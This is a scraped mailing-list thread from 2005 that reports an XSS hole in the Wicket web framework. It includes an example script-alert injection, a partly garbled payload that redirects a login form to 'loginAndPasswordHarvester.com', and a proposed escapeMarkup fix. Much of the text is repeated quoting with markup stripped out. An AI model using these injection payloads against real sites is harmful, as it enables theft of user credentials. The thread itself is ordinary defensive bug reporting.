input type=text value=x = 6 lt; 7 amp; 10 gt; 5instead ofinput type=text value=x = 6  7  10  5special chars should only be RENDERED as html entities, not saved as
html entities in the model. The problem you describe is i think the  at the beginning that makes it all possible, (else it was just a text value of the value attribute)
the  makes it possible to break out of the value parameter of the inputfield. That could pose a security risk, though.Imagine this: You have a login form that saves the username in case thelogin failed and the page is reloaded.
Some malicious person opens the login page and enters this: href="">http://loginAndPasswordHarvester.com'dummy=
He sends off the form, it gets reloaded because the login is invalidand he leaves the terminal for someone else to login.When someone else trys to log in, their username and password get sentto a different server.
So I guess rendering special characters as html entities might be a goodidea.Cheers,Johannes. johan On 11/24/05, *Johannes Fahrenkrug* 
[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Hi, I have built several forms using Wicket. Just out of curiosity I
 tried to enter the following line into a text field: scriptalert('Soylent Green Is People');/script test= When I reload the form, the _javascript_ code gets executed. Shouldn't
 such special characters be converted to HTML entities when the page gets parsed? (You know lt; instead of  and so forth) Cheers, Johannes.
 --- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems?Stop!Download the new AJAX search engine that makes
 searching your log files as easy as surfing theweb.DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click
 http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click ___
 Wicket-user mailing list Wicket-user@lists.sourceforge.net mailto:Wicket-user@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/wicket-user---
This SF.net email is sponsored by: Splunk Inc. Do you grep through log filesfor problems?Stop!Download the new AJAX search engine that makessearching your log files as easy as surfing theweb.DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click___Wicket-user mailing list
Wicket-user@lists.sourceforge.nethttps://lists.sourceforge.net/lists/listinfo/wicket-user

Re: [Wicket-user] Security hole?

[Johan Compagner]

yes you are right that is a bug.I will fix this.I have currently a lot of changes for the Form component so that is just one more :)johanOn 11/24/05, 
Laurent PETIT [EMAIL PROTECTED] wrote:

This problem is not only a security problem, but also a bug :

Indeed, please go to the Wicket Examples, and try this: (http://www.wicket-library.com/wicket-examples/index.html
)
-enter this in the first textfield of the forminput example : My team's name is Wicket's team
- Then erase the value of the Integer textfield (in order to generate an invalid input).
- Submit the form

You can see that the form will not be correctly re-displayed ( check the content of the String textfield)

The problem may be solved by replacing the FormComponent.getValue() method return statement : 

return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : invalidInput;
by this one: 

return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : Strings.escapeMarkup(invalidInput);

( Please note that Component.getModelObjectAsString() (html) escapes the value of the model)

HTH,

-- 
Laurent
On 11/24/05, Johannes Fahrenkrug [EMAIL PROTECTED] wrote:

Johan Compagner wrote: so when i have this: x = 6  7  10  5
 as text in my model it gets encoded into html? (And thats what i see?) That is something i don't wantNo, I think this would be the right thing to do:the value of the model is x = 6  7  10  5
but as soon as wicket renders the page and the value of the input fieldthat the model is attached to,it should render the value as x = 6 lt; 7 amp; 10 gt; 5so that the html source will read

input type=text value=x = 6 lt; 7 amp; 10 gt; 5instead ofinput type=text value=x = 6  7  10  5special chars should only be RENDERED as html entities, not saved as
html entities in the model. The problem you describe is i think the  at the beginning that makes it all possible, (else it was just a text value of the value attribute)

the  makes it possible to break out of the value parameter of the inputfield. That could pose a security risk, though.Imagine this: You have a login form that saves the username in case thelogin failed and the page is reloaded.
Some malicious person opens the login page and enters this: href="" target="_blank" >
http://loginAndPasswordHarvester.com'dummy=
He sends off the form, it gets reloaded because the login is invalidand he leaves the terminal for someone else to login.When someone else trys to log in, their username and password get sentto a different server.
So I guess rendering special characters as html entities might be a goodidea.Cheers,Johannes. johan On 11/24/05, *Johannes Fahrenkrug* 
[EMAIL PROTECTED] mailto:
[EMAIL PROTECTED] wrote: Hi, I have built several forms using Wicket. Just out of curiosity I
 tried to enter the following line into a text field: scriptalert('Soylent Green Is People');/script test= When I reload the form, the _javascript_ code gets executed. Shouldn't
 such special characters be converted to HTML entities when the page gets parsed? (You know lt; instead of  and so forth) Cheers, Johannes.
 --- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems?Stop!Download the new AJAX search engine that makes
 searching your log files as easy as surfing theweb.DOWNLOAD SPLUNK! 
http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click
 http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click
 ___
 Wicket-user mailing list Wicket-user@lists.sourceforge.net mailto:
Wicket-user@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/wicket-user
---
This SF.net email is sponsored by: Splunk Inc. Do you grep through log filesfor problems?Stop!Download the new AJAX search engine that makessearching your log files as easy as surfing theweb.DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click
___Wicket-user mailing list
Wicket-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/wicket-user

Re: [Wicket-user] Security hole?

[Laurent PETIT]

Yes, I'm getting good at pointing bugs / enhancement proposal on the Form component ;-)
On 11/24/05, Johan Compagner [EMAIL PROTECTED] wrote:
yes you are right that is a bug.I will fix this.I have currently a lot of changes for the Form component so that is just one more :)
johan 

On 11/24/05, Laurent PETIT [EMAIL PROTECTED]
 wrote: 

This problem is not only a security problem, but also a bug :

Indeed, please go to the Wicket Examples, and try this: (http://www.wicket-library.com/wicket-examples/index.html 
)
-enter this in the first textfield of the forminput example : My team's name is Wicket's team
- Then erase the value of the Integer textfield (in order to generate an invalid input).
- Submit the form

You can see that the form will not be correctly re-displayed ( check the content of the String textfield)

The problem may be solved by replacing the FormComponent.getValue() method return statement : 

return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : invalidInput;
by this one: 

return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : Strings.escapeMarkup(invalidInput);

( Please note that Component.getModelObjectAsString() (html) escapes the value of the model)

HTH,

-- 
Laurent

On 11/24/05, Johannes Fahrenkrug [EMAIL PROTECTED] wrote: 

Johan Compagner wrote: so when i have this: x = 6  7  10  5 
 as text in my model it gets encoded into html? (And thats what i see?) That is something i don't wantNo, I think this would be the right thing to do:the value of the model is x = 6  7  10  5 
but as soon as wicket renders the page and the value of the input fieldthat the model is attached to,it should render the value as x = 6 lt; 7 amp; 10 gt; 5so that the html source will read 
input type=text value=x = 6 lt; 7 amp; 10 gt; 5instead ofinput type=text value=x = 6  7  10  5special chars should only be RENDERED as html entities, not saved as 
html entities in the model. The problem you describe is i think the  at the beginning that makes it all possible, (else it was just a text value of the value attribute)
the  makes it possible to break out of the value parameter of the inputfield. That could pose a security risk, though.Imagine this: You have a login form that saves the username in case thelogin failed and the page is reloaded. 
Some malicious person opens the login page and enters this:  href="" target="_blank">
 http://loginAndPasswordHarvester.com'dummy=He sends off the form, it gets reloaded because the login is invalidand he leaves the terminal for someone else to login.When someone else trys to log in, their username and password get sent
to a different server. So I guess rendering special characters as html entities might be a goodidea.Cheers,Johannes. johan On 11/24/05, *Johannes Fahrenkrug*  
[EMAIL PROTECTED] mailto:
 [EMAIL PROTECTED] wrote: Hi, I have built several forms using Wicket. Just out of curiosity I  tried to enter the following line into a text field:
 scriptalert('Soylent Green Is People');/script test= When I reload the form, the _javascript_ code gets executed. Shouldn't  such special characters be converted to HTML entities when the
 page gets parsed? (You know lt; instead of  and so forth) Cheers, Johannes.  ---
 This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems?Stop!Download the new AJAX search engine that makes  searching your log files as easy as surfing theweb.DOWNLOAD
 SPLUNK! http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click 
 http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click 
 ___  Wicket-user mailing list 
Wicket-user@lists.sourceforge.net mailto: Wicket-user@lists.sourceforge.net 
 https://lists.sourceforge.net/lists/listinfo/wicket-user
--- This SF.net email is sponsored by: Splunk Inc. Do you grep through log filesfor problems?Stop!Download the new AJAX search engine that makes
searching your log files as easy as surfing theweb.DOWNLOAD SPLUNK! 
http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click___Wicket-user mailing list 
Wicket-user@lists.sourceforge.nethttps://lists.sourceforge.net/lists/listinfo/wicket-user
 

Re: [Wicket-user] Upload Progress bar

[Eelco Hillenius]

I kind of missed this discussion as I was working on the request cycle
handling refactoring. After a short offline discussion with Johan, I
took this as part of the refactoring too. The new way of handling
(still has to be discussed with the other devs after I'm further with
it, but I think it is look much, much better now) has synchronization
depending on what I now call the 'request target' which could be
anything from a page - which should be synchronized on the session -
to shared resources or external resources (like images from your web
app directory) - which shouldn't be synchronized at all.

The Session.updateSession thingy is planned for step 2 of the
refactoring. Ultimately, I'd like to end up with something that would
allow for 'sessionless' applications. For instance, while working with
bookmarkable pages that do not hold any components that implement
IRequestListener, there is really no need to even put them in the
session. In that case, or if you would have a home page like that, I
would like to be able to at least defer creating a session object
until it is actually needed. Not sure how difficult this will be, but
it is probably doable.

The refactoring encompasses quite a lot; it touches most important
internals on Wicket, so I'd like to take a few days to sort it out and
keep really focussed and have offline dicussions with core developers
based on the commits first. So... Johan, Juergen, Igor, Martijn, ...
you know where to find me :)

Eelco


---
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems?  Stop!  Download the new AJAX search engine that makes
searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_idv37alloc_id865op=click
___
Wicket-user mailing list
Wicket-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/wicket-user